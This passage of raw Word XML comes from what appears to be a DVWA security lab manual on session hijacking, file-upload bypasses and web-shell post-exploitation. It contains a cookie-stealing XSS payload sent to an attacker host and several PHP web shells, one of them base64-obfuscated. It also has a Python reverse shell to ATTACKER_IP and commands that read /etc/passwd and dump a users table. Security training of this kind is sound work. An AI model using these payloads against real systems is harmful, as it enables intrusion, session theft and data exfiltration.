        <w:t>Secure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HttpOnly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SameSite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F49C0D5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Security Assessment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7789CA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Absent Secure flag: Sent over HTTP (VULNERABLE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDDF21" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Absent HttpOnly: Stealable via JavaScript/XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7795B92C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Absent SameSite: Vulnerable to CSRF with cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDB21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Session Cookie Analysis in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD4EB00" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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on Cookies tab in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65483B03" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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target site as "Include in scope"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0CBE07" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Navigate DVWA and observe cookie modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E2E783" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Note: Session ID remains same throughout authenticated session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D865AF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Check cookie expiration time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC19CED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Session Fixation Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE0C56" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Before logging in, note the PHPSESSID value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C09B9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Craft URL with specific PHPSESSID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP?PHPSESSID=attacker_controlled_value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADC6D0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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victim clicks link and logs in with this session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0F3C7" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Attacker uses same session ID to access victim's account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584E772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Implement Session Hijacking via XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFC532" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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DVWA, exploit stored XSS vulnerability (from Lab 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D05A1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Inject payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3DAB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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE3D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new Image().src='http://attacker-ip:8000/steal.php?c='+document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C93E1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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F4E79" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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When victim loads page, cookie transmitted to attacker's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A523D32" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Extract PHPSESSID from captured cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60025458" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Repeater, modify PHPSESSID to stolen value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AA21D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send request - Access victim's session as authenticated user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA0CD4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Cookie Replay and Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2ACFC5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Captured Session ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>PHPSESSID=abc123xyz789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E719F98" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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new request in Burp Repeater to protected page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78045AB0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Modify Cookie header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1815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Cookie: PHPSESSID=abc123xyz789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F57B64" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B9E6B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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response shows authenticated content, session hijacking successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034948B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3 Documentation Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D773FCA" w14:textId="77777777" w:rsidR="00000000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captured CSRF token in Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D701C6" w14:textId="77777777" w:rsidR="00000000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Comparison of tokens across multiple requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BEE29" w14:textId="77777777" w:rsidR="00000000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CSRF attack HTML file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C5D94" w14:textId="77777777" w:rsidR="00000000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proof-of-concept CSRF exploitation (successful form submission)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BEE9EF" w14:textId="77777777" w:rsidR="00000000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captured session cookies showing security flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C213045" w14:textId="77777777" w:rsidR="00000000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Burp Repeater using hijacked session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045949E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Explanation of each attack vector with security implications (300 words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78634B29" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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</w:r>
      <w:r w:rsidR="00A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0C3D85F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44754F7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4: File Upload Vulnerabilities and Web Shell Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F933EF5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2EB76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Exploit file upload mechanisms and achieve remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026FD90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4A: File Upload Vulnerability Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E575C7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Access DVWA File Upload Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4086B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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DVWA, navigate to "File Upload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F23D965" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Ensure Security Level is "Low"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57E071" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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 upload interface with file selection field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A2658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Baseline Testing - Legitimate File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AADC8E6" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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legitimate image file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800EB9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convert -size 100x100 xc:blue test_image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B812A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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image through DVWA interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76D24A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Note upload path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/DVWA/uploads/test_image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E5D44" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Baseline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Confirm normal functionality works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FCC144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Basic PHP Web Shell Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8EECB8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Create PHP web shell file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C56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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B368F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if(isset($_GET['cmd'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A36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system($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A38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14:paraId="0B090A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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E701C3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Attempt to upload directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B92AB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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upload succeeds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51769BA3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Access shell at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/DVWA/uploads/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D9D2C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Check for command output (user ID, groups, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC37C79" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Try other commands: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>whoami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pwd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ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628AFF7A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Remote code execution achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977DD24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Double Extension Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B5E2E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Rename shell to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008FC13" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB5E4A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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upload succeeds, access at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CFA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http://DVWA_IP/DVWA/uploads/shell.php.jpg?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B93A07" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Test for execution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3CAAD" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Some servers process </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>.php.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as PHP if PHP handler misconfigured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3282B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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it executes, double extension bypass successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718A5FA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Alternative PHP Extensions Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4560A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shells with various extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36859EE4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shell.phtml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D61D3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shell.php3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0EC30E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shell.php4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105DBD0A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shell.php5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729F103" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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shell.phar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FEBC4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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each and test for execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4726E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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which extensions execute as PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136B097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6: Null Byte Injection (Legacy Systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A216766" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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On older systems (PHP &lt; 5.3.4), null byte in filename causes truncation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E888608" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Filename: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.php%00.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A8972" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Server processes as: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC79828" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Modern systems ignore this technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232503C9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Attempt for educational purposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0EF3E9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7: MIME Type Bypass with Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB00CD4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Create PHP shell and name as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E92364" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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through DVWA interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF8F45" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Intercept request in Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B27F8AC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Modify Content-Type header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277BB793" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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From: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>Content-Type: image/jpeg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E5B1E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Keep same: (no change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A6A24" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Send request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73068B31" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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server only validates Content-Type (not actual file content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16C5C5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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PHP shell uploaded and executes at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>/DVWA/uploads/shell.jpg?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE07C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4B: Polyglot File Creation and Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D6F1B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Create PHP-JPEG Polyglot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C246C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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minimal PHP code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491DEC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&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15E6BC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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valid JPEG magic bytes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4170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convert -size 100x100 xc:blue test.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7632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cat test.jpg &gt;&gt; shell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FBD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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt;&gt; shell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6C6C0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Verify file structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123AB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file shell.jpg  # Should identify as JPEG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30821769" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Upload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>shell.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8E560" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Access: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/DVWA/uploads/shell.jpg?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B143943" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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If executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: Polyglot bypass successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E5B1A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4C: Web Shell Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE413E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Enumerate System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3079C9FB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Access shell with command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://DVWA_IP/DVWA/uploads/shell.php?cmd=uname+-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B466FBC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Reveals OS type, kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839590F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Execute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>cat /etc/passwd | head -10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A8583" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Lists system users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380F677" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Execute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C0115" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Shows current execution context and privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414251E7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File System Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284CEB81" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Execute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to show current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F36C83" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Execute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A969D5A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Navigate database directories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F75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find / -name "*.sql" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0D6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locate database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F7A0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Database Access via Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D840D2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Execute: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>mysql -u root -p database_name &lt; backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3B8491" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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MySQL credentials accessible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5985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mysql -u root -e "SELECT * FROM dvwa.users;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152C793" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Dump sensitive data from database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF298B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Establish Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A99CDB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Python reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF32B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python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE0141" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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URL encode and pass as command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2E9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http://DVWA_IP/DVWA/uploads/shell.php?cmd=python3+reverse_shell.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3669EB" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Listen on attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A374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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976C57B" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Successful connection provides interactive shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82C5BD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Web Shell Obfuscation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8DD7E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Base64 encoded shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638612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&lt;?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7')); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971356E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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makes detection harder while maintaining functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B897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4 Documentation Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76755F29" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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successful legitimate file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0AC4C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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PHP shell command execution output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E9196" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Burp Suite intercepting file upload request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D40740" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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MIME type modification in Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08270156" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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web shell executing system commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B06F9" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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reverse shell connection establishment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F76A48" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Technical report explaining: upload vulnerability chain, bypass techniques, exploitation steps, impact assessment (400 words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B50E3E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00A65FA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A65FAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3E2BE2B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DF0424D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5: Burp Suite Intruder and Advanced Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052C85C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Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813E14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Demonstrate automated vulnerability identification and exploitation using Burp Suite Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB73CE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5A: Burp Suite Intruder Setup for Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A88CBE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Configure Burp Intruder for Login Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222BFD30" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Capture DVWA login request in Burp Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CDBB4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Right-click → Send to Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A543E1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="000000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Intruder tab, click "Clear §" to remove default markers</w:t>
      </w:r>
    </w:p>
